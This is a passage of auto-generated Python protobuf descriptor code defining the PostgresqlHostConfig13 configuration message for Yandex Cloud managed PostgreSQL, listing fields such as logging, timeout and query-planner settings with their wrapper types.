name='log_min_duration_statement', full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlHostConfig13.log_min_duration_statement', index=16,
number=17, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='log_checkpoints', full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlHostConfig13.log_checkpoints', index=17,
number=18, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='log_connections', full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlHostConfig13.log_connections', index=18,
number=19, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='log_disconnections', full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlHostConfig13.log_disconnections', index=19,
number=20, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='log_duration', full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlHostConfig13.log_duration', index=20,
number=21, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='log_error_verbosity', full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlHostConfig13.log_error_verbosity', index=21,
number=22, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='log_lock_waits', full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlHostConfig13.log_lock_waits', index=22,
number=23, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='log_statement', full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlHostConfig13.log_statement', index=23,
number=24, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='log_temp_files', full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlHostConfig13.log_temp_files', index=24,
number=25, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='search_path', full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlHostConfig13.search_path', index=25,
number=26, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='row_security', full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlHostConfig13.row_security', index=26,
number=27, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='default_transaction_isolation', full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlHostConfig13.default_transaction_isolation', index=27,
number=28, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='statement_timeout', full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlHostConfig13.statement_timeout', index=28,
number=29, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='lock_timeout', full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlHostConfig13.lock_timeout', index=29,
number=30, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='idle_in_transaction_session_timeout', full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlHostConfig13.idle_in_transaction_session_timeout', index=30,
number=31, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='bytea_output', full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlHostConfig13.bytea_output', index=31,
number=32, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='xmlbinary', full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlHostConfig13.xmlbinary', index=32,
number=33, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='xmloption', full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlHostConfig13.xmloption', index=33,
number=34, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='gin_pending_list_limit', full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlHostConfig13.gin_pending_list_limit', index=34,
number=35, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='deadlock_timeout', full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlHostConfig13.deadlock_timeout', index=35,
number=36, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='max_locks_per_transaction', full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlHostConfig13.max_locks_per_transaction', index=36,
number=37, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='max_pred_locks_per_transaction', full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlHostConfig13.max_pred_locks_per_transaction', index=37,
number=38, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='array_nulls', full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlHostConfig13.array_nulls', index=38,
number=39, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='backslash_quote', full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlHostConfig13.backslash_quote', index=39,
number=40, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='default_with_oids', full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlHostConfig13.default_with_oids', index=40,
number=41, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='escape_string_warning', full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlHostConfig13.escape_string_warning', index=41,
number=42, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='lo_compat_privileges', full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlHostConfig13.lo_compat_privileges', index=42,
number=43, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='operator_precedence_warning', full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlHostConfig13.operator_precedence_warning', index=43,
number=44, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='quote_all_identifiers', full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlHostConfig13.quote_all_identifiers', index=44,
number=45, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='standard_conforming_strings', full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlHostConfig13.standard_conforming_strings', index=45,
number=46, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='synchronize_seqscans', full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlHostConfig13.synchronize_seqscans', index=46,
number=47, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='transform_null_equals', full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlHostConfig13.transform_null_equals', index=47,
number=48, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='exit_on_error', full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlHostConfig13.exit_on_error', index=48,
number=49, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='seq_page_cost', full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlHostConfig13.seq_page_cost', index=49,
number=50, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='random_page_cost', full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlHostConfig13.random_page_cost', index=50,
number=51, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='enable_bitmapscan', full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlHostConfig13.enable_bitmapscan', index=51,
number=54, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='enable_hashagg', full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlHostConfig13.enable_hashagg', index=52,
number=55, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='enable_hashjoin', full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlHostConfig13.enable_hashjoin', index=53,
number=56, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='enable_indexscan', full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlHostConfig13.enable_indexscan', index=54,
number=57, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='enable_indexonlyscan', full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlHostConfig13.enable_indexonlyscan', index=55,
number=58, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='enable_material', full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlHostConfig13.enable_material', index=56,
number=59, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='enable_mergejoin', full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlHostConfig13.enable_mergejoin', index=57,
number=60, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='enable_nestloop', full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlHostConfig13.enable_nestloop', index=58,
number=61, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='enable_seqscan', full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlHostConfig13.enable_seqscan', index=59,
number=62, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='enable_sort', full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlHostConfig13.enable_sort', index=60,
number=63, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='enable_tidscan', full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlHostConfig13.enable_tidscan', index=61,
number=64, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='max_parallel_workers', full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlHostConfig13.max_parallel_workers', index=62,
number=65, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=b'\372\3071\0060-1024', file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='max_parallel_workers_per_gather', full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlHostConfig13.max_parallel_workers_per_gather', index=63,
number=66, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=b'\372\3071\0060-1024', file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='timezone', full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlHostConfig13.timezone', index=64,
number=67, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='effective_io_concurrency', full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlHostConfig13.effective_io_concurrency', index=65,
number=68, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=b'\372\3071\0060-1000', file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='effective_cache_size', full_name='yandex.cloud.mdb.postgresql.v1.config.PostgresqlHostConfig13.effective_cache_size', index=66,
number=69, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=b'\372\3071\0160-549755813888', file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
_POSTGRESQLHOSTCONFIG13_CONSTRAINTEXCLUSION,
_POSTGRESQLHOSTCONFIG13_FORCEPARALLELMODE,
_POSTGRESQLHOSTCONFIG13_LOGLEVEL,
_POSTGRESQLHOSTCONFIG13_LOGERRORVERBOSITY,
_POSTGRESQLHOSTCONFIG13_LOGSTATEMENT,
_POSTGRESQLHOSTCONFIG13_TRANSACTIONISOLATION,
_POSTGRESQLHOSTCONFIG13_BYTEAOUTPUT,
_POSTGRESQLHOSTCONFIG13_XMLBINARY,
_POSTGRESQLHOSTCONFIG13_XMLOPTION,
_POSTGRESQLHOSTCONFIG13_BACKSLASHQUOTE,
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=157,
serialized_end=6133,
)
_POSTGRESQLHOSTCONFIG13.fields_by_name['recovery_min_apply_delay'].message_type = google_dot_protobuf_dot_wrappers__pb2._INT64VALUE
_POSTGRESQLHOSTCONFIG13.fields_by_name['shared_buffers'].message_type = google_dot_protobuf_dot_wrappers__pb2._INT64VALUE
_POSTGRESQLHOSTCONFIG13.fields_by_name['temp_buffers'].message_type = google_dot_protobuf_dot_wrappers__pb2._INT64VALUE
_POSTGRESQLHOSTCONFIG13.fields_by_name['work_mem'].message_type = google_dot_protobuf_dot_wrappers__pb2._INT64VALUE
_POSTGRESQLHOSTCONFIG13.fields_by_name['temp_file_limit'].message_type = google_dot_protobuf_dot_wrappers__pb2._INT64VALUE
_POSTGRESQLHOSTCONFIG13.fields_by_name['backend_flush_after'].message_type = google_dot_protobuf_dot_wrappers__pb2._INT64VALUE
_POSTGRESQLHOSTCONFIG13.fields_by_name['old_snapshot_threshold'].message_type = google_dot_protobuf_dot_wrappers__pb2._INT64VALUE
_POSTGRESQLHOSTCONFIG13.fields_by_name['max_standby_streaming_delay'].message_type = google_dot_protobuf_dot_wrappers__pb2._INT64VALUE
_POSTGRESQLHOSTCONFIG13.fields_by_name['constraint_exclusion'].enum_type = _POSTGRESQLHOSTCONFIG13_CONSTRAINTEXCLUSION
_POSTGRESQLHOSTCONFIG13.fields_by_name['cursor_tuple_fraction'].message_type = google_dot_protobuf_dot_wrappers__pb2._DOUBLEVALUE
_POSTGRESQLHOSTCONFIG13.fields_by_name['from_collapse_limit'].message_type = google_dot_protobuf_dot_wrappers__pb2._INT64VALUE
_POSTGRESQLHOSTCONFIG13.fields_by_name['join_collapse_limit'].message_type = google_dot_protobuf_dot_wrappers__pb2._INT64VALUE
_POSTGRESQLHOSTCONFIG13.fields_by_name['force_parallel_mode'].enum_type = _POSTGRESQLHOSTCONFIG13_FORCEPARALLELMODE
_POSTGRESQLHOSTCONFIG13.fields_by_name['client_min_messages'].enum_type = _POSTGRESQLHOSTCONFIG13_LOGLEVEL
_POSTGRESQLHOSTCONFIG13.fields_by_name['log_min_messages'].enum_type = _POSTGRESQLHOSTCONFIG13_LOGLEVEL
_POSTGRESQLHOSTCONFIG13.fields_by_name['log_min_error_statement'].enum_type = _POSTGRESQLHOSTCONFIG13_LOGLEVEL
_POSTGRESQLHOSTCONFIG13.fields_by_name['log_min_duration_statement'].message_type = google_dot_protobuf_dot_wrappers__pb2._INT64VALUE
_POSTGRESQLHOSTCONFIG13.fields_by_name['log_checkpoints'].message_type = google_dot_protobuf_dot_wrappers__pb2._BOOLVALUE
_POSTGRESQLHOSTCONFIG13.fields_by_name['log_connections'].message_type = google_dot_protobuf_dot_wrappers__pb2._BOOLVALUE
_POSTGRESQLHOSTCONFIG13.fields_by_name['log_disconnections'].message_type = google_dot_protobuf_dot_wrappers__pb2._BOOLVALUE
_POSTGRESQLHOSTCONFIG13.fields_by_name['log_duration'].message_type = google_dot_protobuf_dot_wrappers__pb2._BOOLVALUE
_POSTGRESQLHOSTCONFIG13.fields_by_name['log_error_verbosity'].enum_type = _POSTGRESQLHOSTCONFIG13_LOGERRORVERBOSITY
_POSTGRESQLHOSTCONFIG13.fields_by_name['log_lock_waits'].message_type = google_dot_protobuf_dot_wrappers__pb2._BOOLVALUE
_POSTGRESQLHOSTCONFIG13.fields_by_name['log_statement'].enum_type = _POSTGRESQLHOSTCONFIG13_LOGSTATEMENT
_POSTGRESQLHOSTCONFIG13.fields_by_name['log_temp_files'].message_type = google_dot_protobuf_dot_wrappers__pb2._INT64VALUE
_POSTGRESQLHOSTCONFIG13.fields_by_name['row_security'].message_type = google_dot_protobuf_dot_wrappers__pb2._BOOLVALUE
_POSTGRESQLHOSTCONFIG13.fields_by_name['default_transaction_isolation'].enum_type = _POSTGRESQLHOSTCONFIG13_TRANSACTIONISOLATION
_POSTGRESQLHOSTCONFIG13.fields_by_name['statement_timeout'].message_type = google_dot_protobuf_dot_wrappers__pb2._INT64VALUE
_POSTGRESQLHOSTCONFIG13.fields_by_name['lock_timeout'].message_type = google_dot_protobuf_dot_wrappers__pb2._INT64VALUE
_POSTGRESQLHOSTCONFIG13.fields_by_name['idle_in_transaction_session_timeout'].message_type = google_dot_protobuf_dot_wrappers__pb2._INT64VALUE
_POSTGRESQLHOSTCONFIG13.fields_by_name['bytea_output'].enum_type = _POSTGRESQLHOSTCONFIG13_BYTEAOUTPUT
_POSTGRESQLHOSTCONFIG13.fields_by_name['xmlbinary'].enum_type = _POSTGRESQLHOSTCONFIG13_XMLBINARY
_POSTGRESQLHOSTCONFIG13.fields_by_name['xmloption'].enum_type = _POSTGRESQLHOSTCONFIG13_XMLOPTION
_POSTGRESQLHOSTCONFIG13.fields_by_name['gin_pending_list_limit'].message_type = google_dot_protobuf_dot_wrappers__pb2._INT64VALUE
_POSTGRESQLHOSTCONFIG13.fields_by_name['deadlock_timeout'].message_type = google_dot_protobuf_dot_wrappers__pb2._INT64VALUE
_POSTGRESQLHOSTCONFIG13.fields_by_name['max_locks_per_transaction'].message_type = google_dot_protobuf_dot_wrappers__pb2._INT64VALUE
_POSTGRESQLHOSTCONFIG13.fields_by_name['max_pred_locks_per_transaction'].message_type = google_dot_protobuf_dot_wrappers__pb2._INT64VALUE
_POSTGRESQLHOSTCONFIG13.fields_by_name['array_nulls'].message_type = google_dot_protobuf_dot_wrappers__pb2._BOOLVALUE
_POSTGRESQLHOSTCONFIG13.fields_by_name['backslash_quote'].enum_type = _POSTGRESQLHOSTCONFIG13_BACKSLASHQUOTE
_POSTGRESQLHOSTCONFIG13.fields_by_name['default_with_oids'].message_type = google_dot_protobuf_dot_wrappers__pb2._BOOLVALUE
_POSTGRESQLHOSTCONFIG13.fields_by_name['escape_string_warning'].message_type = google_dot_protobuf_dot_wrappers__pb2._BOOLVALUE
_POSTGRESQLHOSTCONFIG13.fields_by_name['lo_compat_privileges'].message_type = google_dot_protobuf_dot_wrappers__pb2._BOOLVALUE
_POSTGRESQLHOSTCONFIG13.fields_by_name['operator_precedence_warning'].message_type = google_dot_protobuf_dot_wrappers__pb2._BOOLVALUE
_POSTGRESQLHOSTCONFIG13.fields_by_name['quote_all_identifiers'].message_type = google_dot_protobuf_dot_wrappers__pb2._BOOLVALUE
_POSTGRESQLHOSTCONFIG13.fields_by_name['standard_conforming_strings'].message_type = google_dot_protobuf_dot_wrappers__pb2._BOOLVALUE
_POSTGRESQLHOSTCONFIG13.fields_by_name['synchronize_seqscans'].message_type = google_dot_protobuf_dot_wrappers__pb2._BOOLVALUE
_POSTGRESQLHOSTCONFIG13.fields_by_name['transform_null_equals'].message_type = google_dot_protobuf_dot_wrappers__pb2._BOOLVALUE
_POSTGRESQLHOSTCONFIG13.fields_by_name['exit_on_error'].message_type = google_dot_protobuf_dot_wrappers__pb2._BOOLVALUE
_POSTGRESQLHOSTCONFIG13.fields_by_name['seq_page_cost'].message_type = google_dot_protobuf_dot_wrappers__pb2._DOUBLEVALUE
_POSTGRESQLHOSTCONFIG13.fields_by_name['random_page_cost'].message_type = google_dot_protobuf_dot_wrappers__pb2._DOUBLEVALUE
_POSTGRESQLHOSTCONFIG13.fields_by_name['enable_bitmapscan'].message_type = google_dot_protobuf_dot_wrappers__pb2._BOOLVALUE
_POSTGRESQLHOSTCONFIG13.fields_by_name['enable_hashagg'].message_type = google_dot_protobuf_dot_wrappers__pb2._BOOLVALUE
_POSTGRESQLHOSTCONFIG13.fields_by_name['enable_hashjoin'].message_type = google_dot_protobuf_dot_wrappers__pb2._BOOLVALUE
_POSTGRESQLHOSTCONFIG13.fields_by_name['enable_indexscan'].message_type = google_dot_protobuf_dot_wrappers__pb2._BOOLVALUE
_POSTGRESQLHOSTCONFIG13.fields_by_name['enable_indexonlyscan'].message_type = google_dot_protobuf_dot_wrappers__pb2._BOOLVALUE
_POSTGRESQLHOSTCONFIG13.fields_by_name['enable_material'].message_type = google_dot_protobuf_dot_wrappers__pb2._BOOLVALUE
_POSTGRESQLHOSTCONFIG13.fields_by_name['enable_mergejoin'].message_type = google_dot_protobuf_dot_wrappers__pb2._BOOLVALUE
_POSTGRESQLHOSTCONFIG13.fields_by_name['enable_nestloop'].message_type = google_dot_protobuf_dot_wrappers__pb2._BOOLVALUE
_POSTGRESQLHOSTCONFIG13.fields_by_name['enable_seqscan'].message_type = google_dot_protobuf_dot_wrappers__pb2._BOOLVALUE
_POSTGRESQLHOSTCONFIG13.fields_by_name['enable_sort'].message_type = google_dot_protobuf_dot_wrappers__pb2._BOOLVALUE
_POSTGRESQLHOSTCONFIG13.fields_by_name['enable_tidscan'].message_type = google_dot_protobuf_dot_wrappers__pb2._BOOLVALUE
_POSTGRESQLHOSTCONFIG13.fields_by_name['max_parallel_workers'].message_type = google_dot_protobuf_dot_wrappers__pb2._INT64VALUE
_POSTGRESQLHOSTCONFIG13.fields_by_name['max_parallel_workers_per_gather'].message_type = google_dot_protobuf_dot_wrappers__pb2._INT64VALUE
_POSTGRESQLHOSTCONFIG13.fields_by_name['effective_io_concurrency'].message_type = google_dot_protobuf_dot_wrappers__pb2._INT64VALUE
_POSTGRESQLHOSTCONFIG13.fields_by_name['effective_cache_size'].message_type = google_dot_protobuf_dot_wrappers__pb2._INT64VALUE
_POSTGRESQLHOSTCONFIG13_CONSTRAINTEXCLUSION.containing_type = _POSTGRESQLHOSTCONFIG13
_POSTGRESQLHOSTCONFIG13_FORCEPARALLELMODE.containing_type = _POSTGRESQLHOSTCONFIG13
_POSTGRESQLHOSTCONFIG13_LOGLEVEL.containing_type = _POSTGRESQLHOSTCONFIG13
